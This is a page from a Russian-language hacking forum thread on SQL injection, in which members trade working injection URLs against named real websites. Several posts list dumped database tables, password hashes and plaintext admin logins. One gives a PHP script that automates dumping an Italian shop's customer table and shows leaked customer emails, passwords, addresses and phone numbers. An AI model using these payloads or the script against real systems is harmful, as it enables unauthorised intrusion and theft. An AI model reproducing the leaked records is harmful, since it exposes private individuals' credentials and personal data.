HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 677 из 1604 « Первая < 177577627667 673 674 675 676 677 678 679 680 681 6877277771177 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6761  
Старый 30.10.2008, 10:19
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами: 9420866

Репутация: 228
По умолчанию
Цитата:
Сообщение от SVAROG  
5.0.45-log
А дальше?

Код:
http://www.remhq.com/news_story.php?id=-894'+union+select+1,concat_ws(username,0x3a,password,0x3a,accesslevel),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+hero_users+limit+0,1/*
 
Ответить с цитированием

  #6762  
Старый 30.10.2008, 11:06
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию
исключительно .edu

Lake Superior State University
Код:
http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+29,1/*
PR=7
5.0.20
-------------------------------------------------------------------

National Center for Supercomputing Applications at the University of Illinois(во как!)
Код:
http://www.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1000+union+select+1,version(),3,4,5,6,7,8,9,10/*
PR=7
5.0.45-log 3
пути:
Код:
/afs/ncsa.uiuc.edu/web/www-2006/site/htdocs/AboutUs/People/mailto_func.php
-------------------------------------------------------------------

University of Pennsylvania
Код:
http://asam.sas.upenn.edu/detail.php?id=-861+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11--
PR=7
4.1.15-standard
пути:
Код:
/var/www/ASAM/detail.php
 
Ответить с цитированием

  #6763  
Старый 30.10.2008, 13:11
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами: 9457097

Репутация: 133
По умолчанию
prontospesa.it
средних размеров онлайн шоп
Код:
http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646
таблицы:
Код:
DM-Reward
DM-Target-Campagna
DM-Campagne
ReachKeyGenerale
dtproperties
Acquisti
Acquisto
CAP
Carrelli
Carrello
Commessi
Config
CostiConsegna
CRM
ECommerce
ECommerce1
ECommerce3
IVA
ListaPersonale
MailAccount
Offerta
Offerte
Operatori
ReachKey
Risultati
SenzaEAN
Supermarket
SuperMarket_Cat
Supermarket0
sysconstraints
syssegments
ToDo
Utenti
Utenti_OnLine
кто не ленивый может найдет где нить там кт Мне лично лень
Вытягиваем из таблицы Utenti - email+pass+всякая кадабра типа адреса:
Код:
http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(IdUtente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as%20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarchar)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27%3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bcast(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(RagioneSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indirizzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20nvarchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B%27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono3+as%20nvarchar)+from+Utenti+where+IdUtente=1)--
скрипт на Php для дампинга таблицы Utenti
PHP код:
<?
 set_time_limit(0);
function send_get($get_url)
{
$ch curl_init();
curl_setopt($chCURLOPT_URL$get_url);
curl_setopt($ch,CURLOPT_COOKIEFILE,"./htdocs/1.txt");
curl_setopt($chCURLOPT_HEADER,0);
curl_setopt($chCURLOPT_CONNECTTIMEOUT,30);
curl_setopt($chCURLOPT_FOLLOWLOCATION,0);
curl_setopt($chCURLOPT_RETURNTRANSFER,1);
return $data curl_exec($ch);
}
$postfix 0;
$filename "base".$postfix.".txt";
$desp fopen ($filename,"a+");
for ($id=0;$id<30000;$id++){
$get_url="http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(IdUtente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as%20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarchar)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27%3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bcast(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(RagioneSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indirizzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20nvarchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B%27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono3+as%20nvarchar)+from+Utenti+where+IdUtente=".$id.")--";
$str=send_get($get_url);
if (preg_match("/nvarchar\040'(.*)'\040in\040una\040colonna/",$str,$matches)) {
echo $matches[1];
fputs($desp,$matches[1]);
fputs($desp,"\n");
}
}
fclose($desp);
?>
Вотс чего получаем на выходе :
Код:
1:elena.abba@dmgroup.it:fabio:1:Elena:Abbà::Via BOVE 14:Torino:10129:TO:011 5097327::
3:abbena@dm.unito.it:micoledo:1:Elsa:Abbena::S.da della bocchetta11:Sciolze:10090:TO:011 9603558::
9:matteo.adinolfi@tele2.it:grages64:1:Matteo:Adinolfi::C.so Corsica 45/C:Torino:10135:TO:0113170570::3290848091
12:loaffat@tin.it:nilde:1:Nilde:Affatato::strada del Drosso 140/D:Torino:10135:TO:0113472847::3335336138
 
Ответить с цитированием

  #6764  
Старый 30.10.2008, 16:03
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию
http://shariki.com/news/?id=-1{SQLINJ}

Database Version: 5.0.67-log
Database name: u58240
User name: u58240@10.10.223.217
 
Ответить с цитированием

  #6765  
Старый 30.10.2008, 18:34
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами: 9806786

Репутация: 869
По умолчанию
Код:
http://www.adultfyi.com/read.php?ID=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
Цитата:
4.1.22-log:adultfyi:adultfyi@localhost
Код:
http://www.yesilyurtlar.com.tr/en/urun.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
Цитата:
4.1.20:yesilyurtlar_en:yesilyurtlar@localhost
 
Ответить с цитированием

  #6766  
Старый 31.10.2008, 12:37
N1K70
Banned
Регистрация: 02.01.2008
Сообщений: 195
С нами: 9661106

Репутация: 301
По умолчанию
Код:
http://www.webhoster4u.de/server.php?id=-132+union+all+select+database(),version()--
4.1.22-standard
 
Ответить с цитированием

  #6767  
Старый 01.11.2008, 00:02
=HALK=
Новичок
Регистрация: 30.10.2008
Сообщений: 12
С нами: 9226092

Репутация: 17
По умолчанию
Pr4
Код:
http://www.thenaturenetwork.net/news/news.php?news_id=-1+union+select+1,2,3,4,5,concat_ws(0xb,version(),user(),database()),7,8,9,10,11,12,13,14,15,16--

вот таблицы с колонками:
http://tables-columns.narod.ru/thenaturenetwork.net.txt
 
Ответить с цитированием

  #6768  
Старый 01.11.2008, 01:07
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
С нами: 9655526

Репутация: 1334
По умолчанию
http://www.icehw.net/article.php?id=...,13,14,15,16--

version: 5.0.22-Debian_0ubuntu6.06.3-log
user: icehw@localhost
database: icehw_main

table: login
Concat_ws(0x3a,ID,username,PASSWORD)

http://www.eajc.org/analytics_show_r.php?id=-27+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,n ame,pass),7,8,9+from+adbm_user--

admin:1d1ac3f687c1572b5654e3fbd502a7c9

http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+u sers+limit+2,1--

login:brianficek
pass:85688717ef4fab9
 
Ответить с цитированием

  #6769  
Старый 01.11.2008, 02:01
lastsmile
Познающий
Регистрация: 22.09.2007
Сообщений: 42
С нами: 9808570

Репутация: 22
По умолчанию
НОВЫЕ ТЕХНОЛОГИИ ЗАЩИТЫ ИНФОРМАЦИИ-7000
Яндекс тИЦ 240
Google Page Rank 5


Код:
http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+version(),2,3,4
version() 5.0.51a
user() w7000@localhost
database() w7000

Код:
7000_news
1.	id
2.	news_text
3.	news_date
4.	mode1
5.	mode2
6.	news_link
7.	news_title
7000_stuff_messages 
1.	id
2.	section
3.	date
4.	login
5.	parent
6.	topic
7.	message
8.	made
9.	city
10.	type
11.	quality
12.	price
13.	seen
7000_stuff_sections 
1.	id
2.	title
7000_stuff_users 
1.	id
2.	login
3.	password
4.	email
5.	address
6.	occupation
7.	homepage
8.	interests
9.	icq
10.	sendnews
@x0Elvarc 
1.	id
2.	title
TCat 
1.	id
2.	title
3.	id_cat
4.	pos
banner_buys 
1.	id
2.	bid
3.	sid
4.	uid
5.	ip
6.	crt
7.	extra
banner_click 
1.	id
2.	bid
3.	ip
4.	crt
5.	sid
6.	zoneid
banner_content 
1.	id
2.	path
3.	btype
4.	header
5.	crt
6.	url
banner_main 
1.	id
2.	zoneid
3.	crt
4.	shows
5.	bansrc
6.	on_off
7.	frequency
banner_sessions 
1.	id
2.	sid
3.	ip
4.	crt
banner_sites 
1.	id
2.	description
3.	url
banner_source 
1.	id
2.	sizev
3.	sizeh
4.	type
banner_user 
1.	id
2.	bid
3.	crt
4.	uid
5.	bansid
6.	shows
banner_zones 
1.	id
2.	siteid
3.	width
4.	on_off
5.	description
banscanusers 
1.	id
2.	name
3.	mail
4.	www
5.	phone
6.	ip
7.	login
8.	pass
cat 
1.	id
2.	name
3.	text
4.	rz
5.	vis
6.	konfig
7.	pos
8.	ismain
9.	textmain
10.	photomain
catalog 
1.	id
2.	parent_id
3.	is_section
4.	title
5.	price
categbd 
1.	number
2.	cat
categbd1 
1.	nomer
2.	name
3.	subcat
4.	dateadd
5.	lang
6.	homepage
7.	ratadm
8.	ratusr
9.	download
10.	url
11.	description
далее уже влом искать что-то....
 
Ответить с цитированием

  #6770  
Старый 01.11.2008, 08:40
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами: 9420866

Репутация: 228
По умолчанию
Цитата:
Сообщение от lastsmile  
далее уже влом искать что-то....
А че там дальше то копать?

Пошли юзвери:
Код:
http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+concat_ws(login,0x3a,password),2,3,4+from+7000_stuff_users+limit+01--
Пассы в открытом виде
 
Ответить с цитированием
Ответ
Страница 677 из 1604 « Первая < 177577627667 673 674 675 676 677 678 679 680 681 6877277771177 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.